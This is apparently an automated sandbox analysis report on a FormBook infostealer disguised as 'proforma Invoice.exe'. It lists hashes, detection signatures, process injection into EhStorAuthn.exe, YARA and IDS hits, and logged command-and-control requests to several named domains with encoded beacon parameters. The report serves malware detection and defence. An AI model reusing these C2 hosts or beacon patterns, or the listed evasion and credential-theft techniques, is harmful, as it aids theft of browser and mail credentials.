Windows Analysis Report
proforma Invoice.exe

Overview

General Information

Sample name: proforma Invoice.exe
Analysis ID: 1550873
MD5: 3757282ce10c90df6d5e364e22975534
SHA1: 7b1b6eca6f742cfc044a83c433a506302b1d277e
SHA256: 519e372bb8026c5aea93a6d44aefb4b08eb23731f2f902ae35866c5d6cc3dd97
Tags: exeuser-lowmal3
Infos:

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Yara detected FormBook
.NET source code contains potential unpacker
AI detected suspicious sample
Found direct / indirect Syscall (likely to bypass EDR)
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • proforma Invoice.exe (PID: 7116 cmdline: "C:\Users\user\Desktop\proforma Invoice.exe" MD5: 3757282CE10C90DF6D5E364E22975534)
    • proforma Invoice.exe (PID: 5472 cmdline: "C:\Users\user\Desktop\proforma Invoice.exe" MD5: 3757282CE10C90DF6D5E364E22975534)
      • kYuxUXtJmKaZ.exe (PID: 5776 cmdline: "C:\Program Files (x86)\hZwvkfAAPORRvPaKOyuyOGKGcKxWIVZmFjJDASwISFEbYwBrUWyIMNVx\kYuxUXtJmKaZ.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • EhStorAuthn.exe (PID: 5876 cmdline: "C:\Windows\SysWOW64\EhStorAuthn.exe" MD5: 0C9245FDD67B14B9E7FBEBB88C3A5E7F)
          • kYuxUXtJmKaZ.exe (PID: 2276 cmdline: "C:\Program Files (x86)\hZwvkfAAPORRvPaKOyuyOGKGcKxWIVZmFjJDASwISFEbYwBrUWyIMNVx\kYuxUXtJmKaZ.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 6160 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
00000003.00000002.2475809214.00000000010D0000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000008.00000002.4500691276.00000000053F0000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000006.00000002.4499075005.0000000004530000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000006.00000002.4497065803.00000000006E0000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000006.00000002.4499024657.00000000044E0000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |

Source | Rule | Description | Author | Strings
3.2.proforma Invoice.exe.400000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
3.2.proforma Invoice.exe.400000.0.raw.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |

No Sigma rule has matched

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-11-07T10:09:14.534827+0100 | 2022930 | 1 | A Network Trojan was detected | 4.245.163.56 | 443 | 192.168.2.5 | 49709 | TCP
2024-11-07T10:09:53.290899+0100 | 2022930 | 1 | A Network Trojan was detected | 4.245.163.56 | 443 | 192.168.2.5 | 49922 | TCP

                AV Detection

                Source: http://www.spencermarcu.movie/6jke/?N6gPj2W=rRJ/+EeoqQH1jv9h2PxYf0uEP5S/0RESCBDmMrxCZyLsd2TFJm1VUMTcv3pSTCQ1Dx8MnXqZSxSGPUkXGUSRGRBSA9xnN9k9eX0mqtLeTR1pd/EPiIm/QSAex0qPnPOTeQ==&yx-=dF9dYX9pQR-xIhFpAvira URL Cloud: Label: malware
                Source: http://www.spencermarcu.movie/6jke/Avira URL Cloud: Label: malware
                Source: proforma Invoice.exeReversingLabs: Detection: 52%
                Source: Yara matchFile source: 3.2.proforma Invoice.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.proforma Invoice.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000003.00000002.2475809214.00000000010D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.4500691276.00000000053F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.4499075005.0000000004530000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.4497065803.00000000006E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.4499024657.00000000044E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.2475264775.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.2476745672.0000000002030000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.4498872401.00000000033C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Source: proforma Invoice.exeJoe Sandbox ML: detected
                Source: proforma Invoice.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: proforma Invoice.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: EhStorAuthn.pdbGCTL source: proforma Invoice.exe, 00000003.00000002.2475617708.0000000000CD7000.00000004.00000020.00020000.00000000.sdmp, kYuxUXtJmKaZ.exe, 00000005.00000002.4498094986.0000000000C8E000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: kYuxUXtJmKaZ.exe, 00000005.00000000.2387057880.000000000052E000.00000002.00000001.01000000.0000000C.sdmp, kYuxUXtJmKaZ.exe, 00000008.00000002.4497067951.000000000052E000.00000002.00000001.01000000.0000000C.sdmp
                Source: Binary string: wntdll.pdbUGP source: proforma Invoice.exe, 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, EhStorAuthn.exe, 00000006.00000003.2475630207.00000000043E8000.00000004.00000020.00020000.00000000.sdmp, EhStorAuthn.exe, 00000006.00000002.4499240782.0000000004750000.00000040.00001000.00020000.00000000.sdmp, EhStorAuthn.exe, 00000006.00000003.2477867470.000000000459E000.00000004.00000020.00020000.00000000.sdmp, EhStorAuthn.exe, 00000006.00000002.4499240782.00000000048EE000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: proforma Invoice.exe, proforma Invoice.exe, 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, EhStorAuthn.exe, EhStorAuthn.exe, 00000006.00000003.2475630207.00000000043E8000.00000004.00000020.00020000.00000000.sdmp, EhStorAuthn.exe, 00000006.00000002.4499240782.0000000004750000.00000040.00001000.00020000.00000000.sdmp, EhStorAuthn.exe, 00000006.00000003.2477867470.000000000459E000.00000004.00000020.00020000.00000000.sdmp, EhStorAuthn.exe, 00000006.00000002.4499240782.00000000048EE000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: EhStorAuthn.pdb source: proforma Invoice.exe, 00000003.00000002.2475617708.0000000000CD7000.00000004.00000020.00020000.00000000.sdmp, kYuxUXtJmKaZ.exe, 00000005.00000002.4498094986.0000000000C8E000.00000004.00000020.00020000.00000000.sdmp
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 6_2_006FC270 FindFirstFileW,FindNextFileW,FindClose,6_2_006FC270
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 4x nop then jmp 07D9E55Eh0_2_07D9DC44
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 4x nop then jmp 07D9E55Eh0_2_07D9DBE0
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 4x nop then xor eax, eax6_2_006E9DA0
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 4x nop then mov ebx, 00000004h6_2_046304E8
                Source: Joe Sandbox ViewIP Address: 52.20.84.62 52.20.84.62
                Source: Joe Sandbox ViewIP Address: 195.110.124.133 195.110.124.133
                Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 4.245.163.56:443 -> 192.168.2.5:49709
                Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 4.245.163.56:443 -> 192.168.2.5:49922
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global trafficHTTP traffic detected: GET /4d7f/?yx-=dF9dYX9pQR-xIhFp&N6gPj2W=GYb0rmyr/JAlLZNhnt/PbSIY/4LKqg5t8esebmIUXrwcEcXD+HGwSEbbxHn9xefIHUHI8DRuA6hSDuYZVaPcSdBlDCtcl1FCkIwA6S5urJUXpT4lrZ2q29hRsWK9NvLVVQ== HTTP/1.1Host: www.trifecta.centerAccept: */*Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (X11; SunOS i86pc; rv:31.0) Gecko/20100101 Firefox/31.0
                Source: global trafficHTTP traffic detected: GET /qfwu/?N6gPj2W=6fCxb2xLzjzF4nD7KjQhWEUB1Dc/xE2Ac7kR0Mi0XoRopjw7HNNCf6pSJ3AnVDHsLPCXmSmdJmWxpgfBXwwA4t7semSG378seryKT9cw4v33ezM47Ih1j5HvwkKKbWbCpg==&yx-=dF9dYX9pQR-xIhFp HTTP/1.1Host: www.seraph.bestAccept: */*Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (X11; SunOS i86pc; rv:31.0) Gecko/20100101 Firefox/31.0
                Source: global trafficHTTP traffic detected: GET /o5fg/?N6gPj2W=5onoMf6BmQl2QeVt/VrvVQYA8O/0+XqHKAgaJU0renyYnLBIrjMEkLORFTCyyhU0JhHfx4R92TWl4c733/RJY99e60Kw3j0IgWhxS41JWxIsLFgO3NczRgQE1UQqfRS1SQ==&yx-=dF9dYX9pQR-xIhFp HTTP/1.1Host: www.owinvip.netAccept: */*Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (X11; SunOS i86pc; rv:31.0) Gecko/20100101 Firefox/31.0
                Source: global trafficHTTP traffic detected: GET /9rsa/?N6gPj2W=MJaEnwMoptGuAyQmB3iPl7F+p8qtmKUBGuoMdJ29iBxpANTscusPMMCgTv6bu6SX3cIivBJkXrMlI2rZEQxlLsosjm3OJjcrR+TIxZJDXxtdEHg1mRP53ezQuvD90TyBQQ==&yx-=dF9dYX9pQR-xIhFp HTTP/1.1Host: www.thefokusdong43.clickAccept: */*Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (X11; SunOS i86pc; rv:31.0) Gecko/20100101 Firefox/31.0
                Source: global trafficHTTP traffic detected: GET /6jke/?N6gPj2W=rRJ/+EeoqQH1jv9h2PxYf0uEP5S/0RESCBDmMrxCZyLsd2TFJm1VUMTcv3pSTCQ1Dx8MnXqZSxSGPUkXGUSRGRBSA9xnN9k9eX0mqtLeTR1pd/EPiIm/QSAex0qPnPOTeQ==&yx-=dF9dYX9pQR-xIhFp HTTP/1.1Host: www.spencermarcu.movieAccept: */*Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (X11; SunOS i86pc; rv:31.0) Gecko/20100101 Firefox/31.0
                Source: global trafficHTTP traffic detected: GET /7ozt/?N6gPj2W=psE7W4vuissyAl/ABd0RRSDRsgAd/B1BJj48EisfIdJC69TtqD1fLSmJuMdappGAEB9CQAwJ1/7vpTPOyeunU+wS9pROO2BCMLDVBWEVc4ObTViQoI1sZt/u29nLO6JUpw==&yx-=dF9dYX9pQR-xIhFp HTTP/1.1Host: www.roopiedutech.onlineAccept: */*Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (X11; SunOS i86pc; rv:31.0) Gecko/20100101 Firefox/31.0
                Source: global trafficHTTP traffic detected: GET /c52l/?N6gPj2W=CYuySeqU886kxlWyyNa/wcd36R1F3r0dFV8i/RXeMxM6gRw3d8zll6e6+mgIULDdoE9y629/Yed0CV4AMnOIzXEmhgnpyaCJF/2Tl+LMvC2Uf6a/XdOYn+kCA+BMl9RbhA==&yx-=dF9dYX9pQR-xIhFp HTTP/1.1Host: www.seikai.clickAccept: */*Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (X11; SunOS i86pc; rv:31.0) Gecko/20100101 Firefox/31.0
                Source: global trafficHTTP traffic detected: GET /saaz/?N6gPj2W=E1XhlXFLcWuCDIBP8to2tuUVnSemexwJ48Ab55V5HKBvWu90vpvIEGRMt7lYWMU5NPNXOFUjE36KCHhW/fBhyMiphohAP4glwjROtQZlzRCPRSaJk41pBGj4Bhn1O6AIFQ==&yx-=dF9dYX9pQR-xIhFp HTTP/1.1Host: www.jorbaq.topAccept: */*Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (X11; SunOS i86pc; rv:31.0) Gecko/20100101 Firefox/31.0
                Source: global trafficHTTP traffic detected: GET /w6i7/?N6gPj2W=zf72HCwdm90Brz0/xWE1IYSOiQ3p3A59Q1iHXpkTu9OkdWFvcQX+8+iDJHR0+30T1teAh9aKH0eMHZRU0BnG1yy/rK5I2oPmb97GAfqKy80sg6qoYznK3DHqFQwxpou29A==&yx-=dF9dYX9pQR-xIhFp HTTP/1.1Host: www.neg21.topAccept: */*Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (X11; SunOS i86pc; rv:31.0) Gecko/20100101 Firefox/31.0
                Source: global trafficHTTP traffic detected: GET /2k8c/?N6gPj2W=LN885FCenV0arV5pDJ6h3a+LwxHrBQx0V+LnHznGnxO866p5HdYgFA4Q1Lryskeb84lUzgc9oK+kYxVS/Lu8euZMIM/0QxNAF1muDsae+W878EIY9SjqXiybtD+r8qgxLw==&yx-=dF9dYX9pQR-xIhFp HTTP/1.1Host: www.suerteconysa.onlineAccept: */*Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (X11; SunOS i86pc; rv:31.0) Gecko/20100101 Firefox/31.0
                Source: global trafficHTTP traffic detected: GET /xtuc/?yx-=dF9dYX9pQR-xIhFp&N6gPj2W=nl7gM5aMdEMYbb3ptVYmv1b7ec2+/kw+vnGGIIbLXQ8RGikaSqRdhk/1NtXc33OFwO5l66LjcfQUL5smZ/PpUkgPTPCZ371zTnVFYiKZa83XWAN88d/vEa+bzXIHSkQ2pw== HTTP/1.1Host: www.nutrigenfit.onlineAccept: */*Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (X11; SunOS i86pc; rv:31.0) Gecko/20100101 Firefox/31.0
                Source: global trafficDNS traffic detected: DNS query: www.trifecta.center
                Source: global trafficDNS traffic detected: DNS query: www.seraph.best
                Source: global trafficDNS traffic detected: DNS query: www.owinvip.net
                Source: global trafficDNS traffic detected: DNS query: www.thefokusdong43.click
                Source: global trafficDNS traffic detected: DNS query: www.spencermarcu.movie
                Source: global trafficDNS traffic detected: DNS query: www.roopiedutech.online
                Source: global trafficDNS traffic detected: DNS query: www.seikai.click
                Source: global trafficDNS traffic detected: DNS query: www.jorbaq.top
                Source: global trafficDNS traffic detected: DNS query: www.neg21.top
                Source: global trafficDNS traffic detected: DNS query: www.suerteconysa.online
                Source: global trafficDNS traffic detected: DNS query: www.nutrigenfit.online
                Source: global trafficDNS traffic detected: DNS query: www.meetebok.shop
                Source: unknownHTTP traffic detected: POST /qfwu/ HTTP/1.1Host: www.seraph.bestAccept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brOrigin: http://www.seraph.bestReferer: http://www.seraph.best/qfwu/Content-Type: application/x-www-form-urlencodedCache-Control: no-cacheContent-Length: 208Connection: closeUser-Agent: Mozilla/5.0 (X11; SunOS i86pc; rv:31.0) Gecko/20100101 Firefox/31.0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Thu, 07 Nov 2024 09:11:08 GMTserver: LiteSpeed
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Thu, 07 Nov 2024 09:11:11 GMTserver: LiteSpeed
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Thu, 07 Nov 2024 09:11:13 GMTserver: LiteSpeed
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Thu, 07 Nov 2024 09:11:16 GMTserver: LiteSpeed
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closeexpires: Wed, 11 Jan 1984 05:00:00 GMTcache-control: no-cache, must-revalidate, max-age=0content-type: text/html; charset=UTF-8wpo-cache-status: not cachedwpo-cache-message: The request method was not GET (POST)link: <http://seikai.click/wp-json/>; rel="https://api.w.org/"transfer-encoding: chunkedcontent-encoding: brvary: Accept-Encodingdate: Thu, 07 Nov 2024 09:11:53 GMTserver: LiteSpeed
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closeexpires: Wed, 11 Jan 1984 05:00:00 GMTcache-control: no-cache, must-revalidate, max-age=0content-type: text/html; charset=UTF-8wpo-cache-status: not cachedwpo-cache-message: The request method was not GET (POST)link: <http://seikai.click/wp-json/>; rel="https://api.w.org/"transfer-encoding: chunkedcontent-encoding: brvary: Accept-Encodingdate: Thu, 07 Nov 2024 09:11:55 GMTserver: LiteSpeedData Raw: 34 62 62 65 0d 0a d4 03 17 8a 0c 98 b4 da 1f 12 51 55 fb 61 65 06 60 4d ea 01 50 b5 48 c8 bc 60 f5 c7 af 3f ff fc f7 97 81 b1 3b 20 96 ed b8 9e ef 3f 33 b5 fe 1c 55 e5 70 7f 46 b7 2d d2 01 41 90 94 64 9b 0a 9d ec bd ec 71 92 fe 3d b6 2b 05 93 8f 14 6c 10 e0 00 d0 16 85 55 df f6 5f b7 e5 76 d0 6c ff ab 5a 56 cf 34 d5 7f a6 83 b0 0b 70 f1 11 98 e4 9c f7 5c 65 90 00 29 78 48 82 07 92 23 ca 7a 72 aa 2e b5 57 c7 fc fa d4 15 8e 9d 2f 55 fd af fe d7 54 37 6c 5c 79 86 00 18 1b 36 dd 4d 9f bb 90 aa ab 4c 40 21 3e 2a db 0a 99 56 a6 24 9b b2 4d 25 bb 2b 96 00 c8 ff 6b ce ff 35 6c 56 f7 cf 2f e4 15 41 46 4d 3a bf d7 5d 27 71 a2 a4 80 47 f9 a5 0b a6 56 4c 37 a5 96 dd 62 1c 66 bc 54 2d 6b aa a9 f6 f7 03 80 21 8e 47 d9 59 7c 7c 88 79 45 2c 25 78 c0 60 00 d2 44 3a a4 e9 73 d3 b9 77 57 7b fe 68 f9 da c7 7f 88 70 e9 1d 20 91 a5 e8 2f ed a2 4b 2c a0 88 22 fb a8 42 83 79 01 c8 96 c0 53 00 4f d2 0f 92 65 20 59 02 4e d5 d5 61 e6 cd 7b 92 9f 25 7b 95 6c 7f 39 6e 48 92 2d 67 f9 92 bc de 1f b2 bd 97 d9 ed 11 14 37 84 4c 2f a0 0c 98 2e bf 65 0b 3f 3c 00 3f 40 f0 fe 4f 67 d9 07 bb 14 4d ba e6 d8 87 d0 a5 bc 2e 57 86 66 46 7a 2f 63 ef 16 58 78 83 3e 00 ce 97 f4 f5 ed b3 66 47 8b f2 91 75 ec a0 15 dc 09 2b 00 f4 fa 54 15 2a 88 5d 09 58 6e ba 2d da 3c 86 6a 76 bf 51 44 e4 d9 ac f1 3c 86 6a b3 f3 b2 ee 26 88 88 0f 10 d3 63 43 66 a5 57 ab 6b 06 d2 84 f5 21 e4 de c6 d0 ea be 17 1b 02 62 d9 9c 4c dc c7 30 ab e9 7e ff f5 3a 09 a2 22 a2 41 05 63 63 34 ca bd fb 0e c0 42 62 d0 d6 14 9c 7a 1d 32 36 a2 01 f5 d1 
68 87 97 f8 38 01 13 8f 07 f7 67 be 55 a3 57 5d 5a 90 4b 71 05 07 bb 9b c5 3d cb 99 b0 0e 7d 41 aa bd 76 50 01 cc 29 19 82 0b 9f 42 bd a6 c8 b7 89 c2 59 de 77 88 5c 29 14 16 09 2c 79 bf c7 d0 9a 0b e3 dd f0 71 ce 50 9b f9 ef 77 52 e8 b4 6d fc 10 e2 e3 c1 e0 ce 19 ee e5 3c 16 5f 64 27 3d 82 74 60 3a 2f 5b f9 16 2b 58 4a 3f 9b c2 e3 55 be 31 c2 79 38 79 f6 05 f4 fb f6 22 c1 22 cd d8 21 44 30 f3 be 73 79 1c af 8d 70 7e 01 00 ae b0 34 b6 ea 2c 3a 17 47 df d3 c5 0e 4d 0c 51 54 52 bb c6 96 55 a6 14 0a 8b 7b 9b 4b f1 e6 e3 2f 09 63 27 51 29 fe 8f b7 ed ed 6f 6d 6f ff 67 7b f3 1f db eb 9f f9 c1 9f fd f4 f6 fa 4f b6 d7 3f bd bd f9 a9 ed f5 ff 6d af 7f 7b 7b f3 cb db eb 3f df 5e ff fa f6 fa f7 21 82 ef fd ca ff 7f ff 57 7f e6 fb bf ff a7 df bb fe d7 5c 9c 95 ea 4a 5c 72 dd 10 ac 04 7e dd 61 41 18 63 a2 aa ee 5d 3a a3 79 05 a8 b3 5b Data Ascii: 4bbeQUae`MPH`?; ?3UpF-Adq=+lU_vlZV4p\e)xH#zr.W/UT7l\y6ML@!>*V$M%+k
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closeexpires: Wed, 11 Jan 1984 05:00:00 GMTcache-control: no-cache, must-revalidate, max-age=0content-type: text/html; charset=UTF-8wpo-cache-status: not cachedwpo-cache-message: The request method was not GET (POST)link: <http://seikai.click/wp-json/>; rel="https://api.w.org/"transfer-encoding: chunkedcontent-encoding: brvary: Accept-Encodingdate: Thu, 07 Nov 2024 09:11:58 GMTserver: LiteSpeedData Raw: 34 62 62 65 0d 0a d4 03 17 8a 0c 98 b4 da 1f 12 51 55 fb 61 65 06 60 4d ea 01 50 b5 48 c8 bc 60 f5 c7 af 3f ff fc f7 97 81 b1 3b 20 96 ed b8 9e ef 3f 33 b5 fe 1c 55 e5 70 7f 46 b7 2d d2 01 41 90 94 64 9b 0a 9d ec bd ec 71 92 fe 3d b6 2b 05 93 8f 14 6c 10 e0 00 d0 16 85 55 df f6 5f b7 e5 76 d0 6c ff ab 5a 56 cf 34 d5 7f a6 83 b0 0b 70 f1 11 98 e4 9c f7 5c 65 90 00 29 78 48 82 07 92 23 ca 7a 72 aa 2e b5 57 c7 fc fa d4 15 8e 9d 2f 55 fd af fe d7 54 37 6c 5c 79 86 00 18 1b 36 dd 4d 9f bb 90 aa ab 4c 40 21 3e 2a db 0a 99 56 a6 24 9b b2 4d 25 bb 2b 96 00 c8 ff 6b ce ff 35 6c 56 f7 cf 2f e4 15 41 46 4d 3a bf d7 5d 27 71 a2 a4 80 47 f9 a5 0b a6 56 4c 37 a5 96 dd 62 1c 66 bc 54 2d 6b aa a9 f6 f7 03 80 21 8e 47 d9 59 7c 7c 88 79 45 2c 25 78 c0 60 00 d2 44 3a a4 e9 73 d3 b9 77 57 7b fe 68 f9 da c7 7f 88 70 e9 1d 20 91 a5 e8 2f ed a2 4b 2c a0 88 22 fb a8 42 83 79 01 c8 96 c0 53 00 4f d2 0f 92 65 20 59 02 4e d5 d5 61 e6 cd 7b 92 9f 25 7b 95 6c 7f 39 6e 48 92 2d 67 f9 92 bc de 1f b2 bd 97 d9 ed 11 14 37 84 4c 2f a0 0c 98 2e bf 65 0b 3f 3c 00 3f 40 f0 fe 4f 67 d9 07 bb 14 4d ba e6 d8 87 d0 a5 bc 2e 57 86 66 46 7a 2f 63 ef 16 58 78 83 3e 00 ce 97 f4 f5 ed b3 66 47 8b f2 91 75 ec a0 15 dc 09 2b 00 f4 fa 54 15 2a 88 5d 09 58 6e ba 2d da 3c 86 6a 76 bf 51 44 e4 d9 ac f1 3c 86 6a b3 f3 b2 ee 26 88 88 0f 10 d3 63 43 66 a5 57 ab 6b 06 d2 84 f5 21 e4 de c6 d0 ea be 17 1b 02 62 d9 9c 4c dc c7 30 ab e9 7e ff f5 3a 09 a2 22 a2 41 05 63 63 34 ca bd fb 0e c0 42 62 d0 d6 14 9c 7a 1d 32 36 a2 01 f5 d1 
68 87 97 f8 38 01 13 8f 07 f7 67 be 55 a3 57 5d 5a 90 4b 71 05 07 bb 9b c5 3d cb 99 b0 0e 7d 41 aa bd 76 50 01 cc 29 19 82 0b 9f 42 bd a6 c8 b7 89 c2 59 de 77 88 5c 29 14 16 09 2c 79 bf c7 d0 9a 0b e3 dd f0 71 ce 50 9b f9 ef 77 52 e8 b4 6d fc 10 e2 e3 c1 e0 ce 19 ee e5 3c 16 5f 64 27 3d 82 74 60 3a 2f 5b f9 16 2b 58 4a 3f 9b c2 e3 55 be 31 c2 79 38 79 f6 05 f4 fb f6 22 c1 22 cd d8 21 44 30 f3 be 73 79 1c af 8d 70 7e 01 00 ae b0 34 b6 ea 2c 3a 17 47 df d3 c5 0e 4d 0c 51 54 52 bb c6 96 55 a6 14 0a 8b 7b 9b 4b f1 e6 e3 2f 09 63 27 51 29 fe 8f b7 ed ed 6f 6d 6f ff 67 7b f3 1f db eb 9f f9 c1 9f fd f4 f6 fa 4f b6 d7 3f bd bd f9 a9 ed f5 ff 6d af 7f 7b 7b f3 cb db eb 3f df 5e ff fa f6 fa f7 21 82 ef fd ca ff 7f ff 57 7f e6 fb bf ff a7 df bb fe d7 5c 9c 95 ea 4a 5c 72 dd 10 ac 04 7e dd 61 41 18 63 a2 aa ee 5d 3a a3 79 05 a8 b3 5b Data Ascii: 4bbeQUae`MPH`?; ?3UpF-Adq=+lU_vlZV4p\e)xH#zr.W/UT7l\y6ML@!>*V$M%+k
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Thu, 07 Nov 2024 09:12:07 GMT | Server: Apache | Content-Length: 389 | Connection: close | Content-Type: text/html | Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Thu, 07 Nov 2024 09:12:09 GMT | Server: Apache | Content-Length: 389 | Connection: close | Content-Type: text/html | Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Thu, 07 Nov 2024 09:12:12 GMT | Server: Apache | Content-Length: 389 | Connection: close | Content-Type: text/html | Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Thu, 07 Nov 2024 09:12:14 GMT | Server: Apache | Content-Length: 389 | Connection: close | Content-Type: text/html; charset=utf-8 | Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
